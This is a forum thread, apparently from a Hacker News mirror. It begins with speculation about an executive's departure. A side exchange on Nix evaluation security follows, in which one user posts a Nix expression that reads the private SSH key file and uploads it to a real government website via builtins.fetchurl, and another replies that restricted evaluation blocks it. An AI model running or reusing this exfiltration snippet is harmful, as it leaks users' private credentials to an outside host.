zlacker

>>wavela+(OP)
seemed inevitable after that ouster attempt, probably just working out the details of the exit. But the day after their new features release announcement?

>>ren_en+52
"Get next major feature to release and you can go as a friend" might have been part of an earlier agreement.

>>ptero+A2
Sounds like a threat.

>>beeboo+r5
When you take a shot at the king, you better not miss.

>>johnbe+78
Or, in this case, when you take a shot at Machiavelli.

>>karma_+nu
Hi, sorry for the unrelated comment. I actually wanted to reply to your comment at >>40208937 , but that comment was made too long ago and I can no longer reply to it directly.

In that comment, you wrote:

> It can delete your home directory or email your ssh private keys to Zimbabwe.

I thought that you might be interested to know that it is still possible to exfiltrate secrets by evaluating Nix expressions. Here is an example Nix expression which will upload your private SSH key to Zimbabwe's government's website (don't run this!):

    let
      pkgs = import (fetchTarball "https://github.com/NixOS/nixpkgs/archive/0ef56bec7281e2372338f2dfe7c13327ce96f6bb.tar.gz") {};
    in
    builtins.fetchurl "https://www.zim.gov.zw/?${pkgs.lib.escapeURL (builtins.readFile ~/.ssh/id_rsa)}"

It does not need --impure or any other unusual switches to work.

Hope this helps.

>>CyberS+o15
How is that supposed to "delete my home directory"?

Also, it doesn't work:

    error: access to absolute path '/home/user/.ssh/id_rsa' is forbidden in restricted mode

Maybe you don't know about restrict-eval? All the CI for nixpkgs is done using that option, so it will never break anything. Turning off restrict-eval is pretty crazy; there's no reason to do that and it's dangerous.

https://nixos.org/manual/nix/unstable/command-ref/conf-file....

Hope this helps.

I don't think it did. I'm not sure what it was supposed to help with.